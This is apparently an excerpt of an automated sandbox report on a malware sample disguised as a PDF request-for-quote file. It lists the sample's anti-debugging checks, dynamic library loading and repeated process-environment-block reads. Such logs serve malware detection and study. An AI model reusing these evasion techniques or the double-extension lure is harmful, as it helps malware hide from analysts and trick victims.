          Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_004088A0 rdtsc 2_2_004088A0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00409B10 LdrLoadDll,2_2_00409B10
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_72AD1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,0_2_72AD1000
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_00401FDC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_026C163F mov eax, dword ptr fs:[00000030h]0_2_026C163F
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_026C1857 mov eax, dword ptr fs:[00000030h]0_2_026C1857
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A090AF mov eax, dword ptr fs:[00000030h]2_2_00A090AF
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9080 mov eax, dword ptr fs:[00000030h]2_2_009C9080
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FF0BF mov ecx, dword ptr fs:[00000030h]2_2_009FF0BF
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FF0BF mov eax, dword ptr fs:[00000030h]2_2_009FF0BF
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FF0BF mov eax, dword ptr fs:[00000030h]2_2_009FF0BF
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A43884 mov eax, dword ptr fs:[00000030h]2_2_00A43884
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A43884 mov eax, dword ptr fs:[00000030h]2_2_00A43884
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h]2_2_009F20A0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h]2_2_009F20A0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h]2_2_009F20A0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h]2_2_009F20A0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h]2_2_009F20A0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h]2_2_009F20A0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C58EC mov eax, dword ptr fs:[00000030h]2_2_009C58EC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]2_2_00A5B8D0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5B8D0 mov ecx, dword ptr fs:[00000030h]2_2_00A5B8D0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]2_2_00A5B8D0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]2_2_00A5B8D0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]2_2_00A5B8D0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]2_2_00A5B8D0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C40E1 mov eax, dword ptr fs:[00000030h]2_2_009C40E1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C40E1 mov eax, dword ptr fs:[00000030h]2_2_009C40E1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C40E1 mov eax, dword ptr fs:[00000030h]2_2_009C40E1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h]2_2_00A47016
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h]2_2_00A47016
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h]2_2_00A47016
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F002D mov eax, dword ptr fs:[00000030h]2_2_009F002D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F002D mov eax, dword ptr fs:[00000030h]2_2_009F002D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F002D mov eax, dword ptr fs:[00000030h]2_2_009F002D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F002D mov eax, dword ptr fs:[00000030h]2_2_009F002D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F002D mov eax, dword ptr fs:[00000030h]2_2_009F002D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h]2_2_009DB02A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h]2_2_009DB02A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h]2_2_009DB02A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h]2_2_009DB02A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A94015 mov eax, dword ptr fs:[00000030h]2_2_00A94015
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A94015 mov eax, dword ptr fs:[00000030h]2_2_00A94015
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E0050 mov eax, dword ptr fs:[00000030h]2_2_009E0050
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E0050 mov eax, dword ptr fs:[00000030h]2_2_009E0050
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A82073 mov eax, dword ptr fs:[00000030h]2_2_00A82073
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A91074 mov eax, dword ptr fs:[00000030h]2_2_00A91074
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A469A6 mov eax, dword ptr fs:[00000030h]2_2_00A469A6
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A849A4 mov eax, dword ptr fs:[00000030h]2_2_00A849A4
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A849A4 mov eax, dword ptr fs:[00000030h]2_2_00A849A4
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A849A4 mov eax, dword ptr fs:[00000030h]2_2_00A849A4
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A849A4 mov eax, dword ptr fs:[00000030h]2_2_00A849A4
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2990 mov eax, dword ptr fs:[00000030h]2_2_009F2990
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA185 mov eax, dword ptr fs:[00000030h]2_2_009FA185
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A451BE mov eax, dword ptr fs:[00000030h]2_2_00A451BE
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A451BE mov eax, dword ptr fs:[00000030h]2_2_00A451BE
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A451BE mov eax, dword ptr fs:[00000030h]2_2_00A451BE
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A451BE mov eax, dword ptr fs:[00000030h]2_2_00A451BE
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EC182 mov eax, dword ptr fs:[00000030h]2_2_009EC182
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F61A0 mov eax, dword ptr fs:[00000030h]2_2_009F61A0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F61A0 mov eax, dword ptr fs:[00000030h]2_2_009F61A0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A541E8 mov eax, dword ptr fs:[00000030h]2_2_00A541E8
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h]2_2_009CB1E1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h]2_2_009CB1E1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h]2_2_009CB1E1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h]2_2_009C9100
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h]2_2_009C9100
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h]2_2_009C9100
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F513A mov eax, dword ptr fs:[00000030h]2_2_009F513A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F513A mov eax, dword ptr fs:[00000030h]2_2_009F513A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h]2_2_009E4120
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h]2_2_009E4120
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h]2_2_009E4120
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h]2_2_009E4120
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E4120 mov ecx, dword ptr fs:[00000030h]2_2_009E4120
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EB944 mov eax, dword ptr fs:[00000030h]2_2_009EB944
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EB944 mov eax, dword ptr fs:[00000030h]2_2_009EB944
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CB171 mov eax, dword ptr fs:[00000030h]2_2_009CB171
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CB171 mov eax, dword ptr fs:[00000030h]2_2_009CB171
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CC962 mov eax, dword ptr fs:[00000030h]2_2_009CC962
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FD294 mov eax, dword ptr fs:[00000030h]2_2_009FD294
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FD294 mov eax, dword ptr fs:[00000030h]2_2_009FD294
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DAAB0 mov eax, dword ptr fs:[00000030h]2_2_009DAAB0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DAAB0 mov eax, dword ptr fs:[00000030h]2_2_009DAAB0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FFAB0 mov eax, dword ptr fs:[00000030h]2_2_009FFAB0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]2_2_009C52A5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]2_2_009C52A5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]2_2_009C52A5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]2_2_009C52A5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]2_2_009C52A5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2ACB mov eax, dword ptr fs:[00000030h]2_2_009F2ACB
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2AE4 mov eax, dword ptr fs:[00000030h]2_2_009F2AE4
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E3A1C mov eax, dword ptr fs:[00000030h]2_2_009E3A1C
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CAA16 mov eax, dword ptr fs:[00000030h]2_2_009CAA16
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CAA16 mov eax, dword ptr fs:[00000030h]2_2_009CAA16
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A04A2C mov eax, dword ptr fs:[00000030h]2_2_00A04A2C
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A04A2C mov eax, dword ptr fs:[00000030h]2_2_00A04A2C
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C5210 mov eax, dword ptr fs:[00000030h]2_2_009C5210
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C5210 mov ecx, dword ptr fs:[00000030h]2_2_009C5210
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C5210 mov eax, dword ptr fs:[00000030h]2_2_009C5210
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C5210 mov eax, dword ptr fs:[00000030h]2_2_009C5210
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D8A0A mov eax, dword ptr fs:[00000030h]2_2_009D8A0A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8AA16 mov eax, dword ptr fs:[00000030h]2_2_00A8AA16
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8AA16 mov eax, dword ptr fs:[00000030h]2_2_00A8AA16
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7B260 mov eax, dword ptr fs:[00000030h]2_2_00A7B260
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7B260 mov eax, dword ptr fs:[00000030h]2_2_00A7B260
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98A62 mov eax, dword ptr fs:[00000030h]2_2_00A98A62
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A0927A mov eax, dword ptr fs:[00000030h]2_2_00A0927A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]2_2_009C9240
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]2_2_009C9240
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]2_2_009C9240
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]2_2_009C9240
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A54257 mov eax, dword ptr fs:[00000030h]2_2_00A54257
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8EA55 mov eax, dword ptr fs:[00000030h]2_2_00A8EA55
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2397 mov eax, dword ptr fs:[00000030h]2_2_009F2397
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A95BA5 mov eax, dword ptr fs:[00000030h]2_2_00A95BA5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FB390 mov eax, dword ptr fs:[00000030h]2_2_009FB390
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D1B8F mov eax, dword ptr fs:[00000030h]2_2_009D1B8F
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D1B8F mov eax, dword ptr fs:[00000030h]2_2_009D1B8F
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8138A mov eax, dword ptr fs:[00000030h]2_2_00A8138A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7D380 mov ecx, dword ptr fs:[00000030h]2_2_00A7D380
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4BAD mov eax, dword ptr fs:[00000030h]2_2_009F4BAD
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4BAD mov eax, dword ptr fs:[00000030h]2_2_009F4BAD
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4BAD mov eax, dword ptr fs:[00000030h]2_2_009F4BAD
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A453CA mov eax, dword ptr fs:[00000030h]2_2_00A453CA
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A453CA mov eax, dword ptr fs:[00000030h]2_2_00A453CA
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EDBE9 mov eax, dword ptr fs:[00000030h]2_2_009EDBE9
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]2_2_009F03E2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]2_2_009F03E2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]2_2_009F03E2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]2_2_009F03E2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]2_2_009F03E2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]2_2_009F03E2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8131B mov eax, dword ptr fs:[00000030h]2_2_00A8131B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CF358 mov eax, dword ptr fs:[00000030h]2_2_009CF358
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CDB40 mov eax, dword ptr fs:[00000030h]2_2_009CDB40
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F3B7A mov eax, dword ptr fs:[00000030h]2_2_009F3B7A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F3B7A mov eax, dword ptr fs:[00000030h]2_2_009F3B7A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98B58 mov eax, dword ptr fs:[00000030h]2_2_00A98B58
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CDB60 mov ecx, dword ptr fs:[00000030h]2_2_009CDB60
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D849B mov eax, dword ptr fs:[00000030h]2_2_009D849B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A814FB mov eax, dword ptr fs:[00000030h]2_2_00A814FB
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46CF0 mov eax, dword ptr fs:[00000030h]2_2_00A46CF0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46CF0 mov eax, dword ptr fs:[00000030h]2_2_00A46CF0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46CF0 mov eax, dword ptr fs:[00000030h]2_2_00A46CF0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98CD6 mov eax, dword ptr fs:[00000030h]2_2_00A98CD6
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h]2_2_00A9740D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h]2_2_00A9740D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h]2_2_00A9740D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]2_2_00A81C06
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46C0A mov eax, dword ptr fs:[00000030h]2_2_00A46C0A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46C0A mov eax, dword ptr fs:[00000030h]2_2_00A46C0A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46C0A mov eax, dword ptr fs:[00000030h]2_2_00A46C0A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46C0A mov eax, dword ptr fs:[00000030h]2_2_00A46C0A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FBC2C mov eax, dword ptr fs:[00000030h]2_2_009FBC2C
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA44B mov eax, dword ptr fs:[00000030h]2_2_009FA44B
